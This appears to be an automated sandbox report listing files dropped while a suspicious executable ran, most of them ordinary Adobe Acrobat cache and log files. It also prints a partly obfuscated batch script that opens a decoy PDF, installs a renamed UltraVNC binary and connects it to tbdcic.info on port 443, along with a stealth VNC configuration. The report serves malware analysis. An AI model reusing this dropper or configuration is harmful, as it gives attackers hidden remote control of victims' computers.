Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.2844944536930285
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfYdPeUkwRe9:YvXKXbOlpSGcDicXYGg8Ukee9
MD5:	0B2CDDF70D1227669A4E444A90826687
SHA1:	16E7A16ECA121D7ACDDA015B86873D777C501AEC
SHA-256:	4CACFE462D5C2250879541C9856AEFF0929EC2264B7D3BA37A11B8A3A17D28B2
SHA-512:	E970ECB9DC5F856CDDA15804BA2039AE59B28ED7E2509E5BB3D5064E5039D76D54A5AFE40AD8D76AAE9B076728BE8C1D65E1C5D57BD495197D3601C787C5563C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.270853195166169
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJf+dPeUkwRe9:YvXKXbOlpSGcDicXYG28Ukee9
MD5:	9C5ECC4BFC24A996D955AB1ABBA0A2D3
SHA1:	BF7C6FCC022020F51F30A39D83B68E7A6BD0B51A
SHA-256:	7FE495C2D5A1B1AC632D5BDF5C5F1D19DF6F34BEB8009262F81DBB58A44DC224
SHA-512:	B6A6C7176D2C4E6578CDECCFAAE50910E1E5E3492EE5B587119AA515680B51F238611F225BBFC994FB3EBA75C8A0E7A0E72227F59839E18363CAADCF4F169F00
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.268148118695462
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfbPtdPeUkwRe9:YvXKXbOlpSGcDicXYGDV8Ukee9
MD5:	6A079ECDD1B8C448C7769D93DF47E363
SHA1:	7DBF2E2C1FA98F4429BBC01B02130C2BCAC13D94
SHA-256:	1AA387C309A4D8511BAB9D2DAE8D9F46A7DB2108C4B351C2C10F21F903BC580F
SHA-512:	BFB3DA3B8D928642C0BEE0330F59780E3146EB3F1CCB4279003EB0C0C971FEBAFE0C9C6B30A70A1F8D0A2B5EC7FBF3B953F9CE814C39D581A10624E19B17E91F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.271314819092963
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJf21rPeUkwRe9:YvXKXbOlpSGcDicXYG+16Ukee9
MD5:	677554BD9CEBDDB93193930AA25A9A13
SHA1:	ADF4B40D941A7FBB5C2EF6EC6223814B6379C83A
SHA-256:	9D6979BABCCBC945BA27357463C752F29D2896470E5C6DDFB6B5B880C96D2871
SHA-512:	8A41FD27C4D6D200CEDBA1826175F090EBA5E73058F1BCD0823131CDA00797FEA2EF5F9C4CB09ACC218D8953E61F58D04675E890957F92A4D5C0B04CD9721071
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.661805838582667
Encrypted:	false
SSDEEP:	24:Yv6XCl47+cXtamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSSY:Yvt+XBBgkDMUJUAh8cvMSY
MD5:	17FC48CAD313521089D01200076008A9
SHA1:	3973BB8A5815324B0BA492047A9A8EA9E66ED42F
SHA-256:	90591E83763F090326B554B73431298E55B1F660AEA533CA8EC96D5957D8C322
SHA-512:	0A8261FCD0C8ACC7EB6EAC13E6CA692B5ED3E752410046E6E3A17775C58713179462700000E8C1B291FA9E321CFCEE06E5F6DBC37775374E6334877D636CA404
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.24688432673236
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfshHHrPeUkwRe9:YvXKXbOlpSGcDicXYGUUUkee9
MD5:	0F956FB4DB5D4F4DB93437F5E4F9E86C
SHA1:	FC0219BFABB978B04F9BF8DE0016BDE94D547322
SHA-256:	7AE6BA781F3BEE4E8072BF4E0FEA606F11EE047D0A40CD35C617094C07604365
SHA-512:	BD8007AAD14DBCE879ED402C546BC93C09391D6D6FD0935608422044BFF8646CF441988688E833EC1BA8358B7EEE0B7FC2E9C4621D01091158CAD89B895B42D2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.258141536410747
Encrypted:	false
SSDEEP:	6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJTqgFCrPeUkwRe9:YvXKXbOlpSGcDicXYGTq16Ukee9
MD5:	941DADA3EA9FCD2E49BD435AB5052B33
SHA1:	DA021DC6F615DCA9C2FB1CAA60C48DB4904954EC
SHA-256:	495987D69B965989D6EC9F0596C358E328E469B37AD467976540452FA11AA01C
SHA-512:	A70EA04AFA4CC6ED8B13918EC360741AD498D5D056897F3B9240FBAD9934145D577C9251F8FA5470C14EBFE9BF26782C3DA542B8EF514CD9C9979C3C02135383
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.147038781471403
Encrypted:	false
SSDEEP:	48:YEfwVUq5m1XWKvIiNK9i2eWcdW26XB8x9Dc:wVj54WKgx5kz6XMDc
MD5:	2248781A2673B395007D0A61A9530ADA
SHA1:	879B082387DFB4ADFFB69299429637D605741156
SHA-256:	2AB03731B5A9F0BC5BEF58A49798DFFC8B1092BEFD9AC87AC09475F7AF344AE6
SHA-512:	C68EE15523E3C6712FA0BBFF534183CE6982C6259575868633B0F3B74210BFD210A93DD919DF305297DC6BBC403D5E6E3B60C41B6513DE4C3F556465AF596D9D
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"d96ea3abdaccbd8c3c255ab921cc5d74","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734956965000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"cb403f8d3793c3abdfd70fe93634a554","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734956965000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"8c1b77a6c4f0ed9f6b4cc7e1bbce3b2d","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734956965000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"487b8eddb7e944186701bbc76050b69f","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734956965000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"25d45563c580c578c726358ab1106a82","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734956965000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"864f6433c0a0c86323bc00b7888f4765","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.1453114227554768
Encrypted:	false
SSDEEP:	24:TLhx/XYKQvGJF7ursl5gRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUud8:TFl2GL7msGXc+XcGNFlRYIX2v3k7
MD5:	210DC19EF892831FEF9DE98371FD5A14
SHA1:	7CCAA11A5343FB8DB535020D61B9D11CF1D524D1
SHA-256:	C0A0DC8BA6BB70A834D201F11A002D52321B61B822B192D500CDAB2DD51ED1A9
SHA-512:	C209E37CE0B67DDBC59D08532DDD31F4A315359EC28F4B269B54DB3BC1DA4606A109F6C17324B5F7338178ED7573ED6C24F271D3F4D5F20F671391F50E4C5542
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.5515216252577626
Encrypted:	false
SSDEEP:	24:7+twH5gUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxjqLxx/XT:7MGXc+XcGNFlRYIX2vOqVl2GL7ms5
MD5:	7161E0D68C669BEE134ACA3959FD06FF
SHA1:	44380E03600B05CB45ABA042249F418C66DBE1F6
SHA-256:	38713FD63680772C6603840D48DC5381397CF4869E572037AC73913A5C468A5D
SHA-512:	68EA4AB718A4C988F2A055C7095828FD73AF31FFC7F234E7873B87D740DDD05137B46DF13174EC76AE75227DA050BFD18E03AD804CC51F29AEE66DFE73327673
Malicious:	false
Preview:	.... .c......j...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgp7fZqPvFZTbX1RGLTZwg/KVrKjYyu:6a6TZ44ADEp7f8PvFxD1t9UjK
MD5:	38BE3D2FEF4EF8CEE3827C8F335DF8FD
SHA1:	7F545B18626D4DE7D3AEE6802209C05076CC5C70
SHA-256:	B9C656B3DD817DC2CEA58AC4ACF2558C263BF8B91A50377B5CD734ACF0EE0D5C
SHA-512:	60F6DB32AFD854D72DD2C5D9B3093D4E7C0959E205B9E60F0ADAC62C21B406000F37F4F1E57B40CFCB6AA353C35AAF08AE7C14CB49E6192BAB2C7ABBB4536489
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5482310161066753

Download File

Process:	C:\Users\user\Desktop\Olz7TmvkEW.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	5.5415018235723945
Encrypted:	false
SSDEEP:	24:gDo8Dlr0RMqL0LtvJW2urcW1SalC/ki2wpx/m:aEb2AhFWx/m
MD5:	651796E1EB5F2C51A6DD6929A65184DA
SHA1:	C475C14C2D71453126FBDE6E135C4B68801A0E9F
SHA-256:	8F0E40CBAAA9C09FA66C18BB90B54FD373EAEF4328E166EB5D0A3EE036F8DD49
SHA-512:	C76F34CD8F7BC54A2D229B6DE8C0899FD676DB75001BAF0A7394655BE85CCE65539D3B7D1565A2381ADECF851615B9A989C9D83B22B6732BA4272026D9D8454F
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set dLblEw=nhost.set H9zjF6=nne.set Ely6ya=co.set rsZWbB=exe.set e2uPdm=Lom.set RscJfa=pdf.set DE4CBb=raVNC.set jq2jOU=%COMPUTERNAME%.set q6noQx=autore.set WWfq61=%WINDIR%\Tasks\698563441.cmd.set AMDK6l=tbdcic.info.set qC9Ryl=Thj0Wf.set eUynLD=443.set uTrzGi=co.set ayToqv=ct.set nM9rdS=Ult.set TfRayV=sync_browser.set erudre=ini.timeout /t 1.copy "gTFLK1.jBd3Ei" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%" & start "" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%".timeout /t 1.taskkill /f /im %TfRayV%.%rsZWbB% .timeout /t 2.copy "GIjul8.QTIrrr" "%TfRayV%.%rsZWbB%".timeout /t 1.copy "CEpr8q.li7XUg" "%nM9rdS%%DE4CBb%.%erudre%".timeout /t 2.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% .timeout /t 8.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% -%q6noQx%%Ely6ya%%H9zjF6%%ayToqv% -id:%jq2jOU%_%qC9Ryl% -%Ely6ya%%H9zjF6%%ayToqv% %AMDK6l%:%eUynLD%.timeout /t 2.copy "sdABZ4.E1924R" "%uTrzGi%%dLblEw%.%rsZWbB%".timeout /t 4.:loop.if exist "%WWfq61%" (. cmd /c "%WWfq61%". tim

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\CEpr8q.li7XUg

Download File

Process:	C:\Users\user\Desktop\Olz7TmvkEW.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.216893826927931
Encrypted:	false
SSDEEP:	24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
MD5:	7EB58E0D2316B8ECE029C804BF4BA8FA
SHA1:	A2A8E2518D12A53CCFCAB925C124933172044D08
SHA-256:	71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
SHA-512:	3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
Malicious:	false
Preview:	[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr

Download File

Process:	C:\Users\user\Desktop\Olz7TmvkEW.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1945368
Entropy (8bit):	6.532894678367002
Encrypted:	false
SSDEEP:	24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
MD5:	749B3A68B9C5325D592822EE7C2C17EC
SHA1:	3EDE6BB2DF969432358A5883CF226971FDE8B7D4
SHA-256:	F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
SHA-512:	B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......\|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......\|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\gTFLK1.jBd3Ei

Download File

Process:	C:\Users\user\Desktop\Olz7TmvkEW.exe
File Type:	PDF document, version 1.5 (zip deflate encoded)
Category:	dropped
Size (bytes):	605114
Entropy (8bit):	7.931189302613814
Encrypted:	false
SSDEEP:	12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
MD5:	A18D0E3EEEF0D6E099BAB52F8B041446
SHA1:	4879750BEC07AA11629950310AF538E9A9D91D20
SHA-256:	95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
SHA-512:	6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
Malicious:	false
Preview:	%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:\|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi.....T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R

Download File

Process:	C:\Users\user\Desktop\Olz7TmvkEW.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	867840
Entropy (8bit):	6.386550733462827
Encrypted:	false
SSDEEP:	12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
MD5:	0F568F6C821565AB9FF45C7457953789
SHA1:	F948A4C5E01A74B17D0F966615834BA76DC1BADC
SHA-256:	CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
SHA-512:	B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI18e2e.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.5029068020919194
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAkXNlH:Qw946cPbiOxDlbYnuRKDlDXN9
MD5:	64F94D7B437BC5E4EE5EFB2ED1932091
SHA1:	173613327CED1CDFF510922032B82A207D60864D
SHA-256:	6BEA576D4F2690A3D3689943842FEEB4D59474309EBD5B89E6BB5E7010B86EC3
SHA-512:	16343E0E0856D03279848312E15D68358B4A016ED00FBCF0A9AE67CE95A99113B5956FF16DB0DBD2738DA411F0AEA821F07039589E1DD02EC86D9E13197D2C42
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.2.9.:.2.1. .=.=.=.....

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-23 07-29-15-019.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.338264912747007
Encrypted:	false
SSDEEP:	384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
MD5:	128A51060103D95314048C2F32A15C66
SHA1:	EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
SHA-256:	601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
SHA-512:	55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
Malicious:	false
Preview:	SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

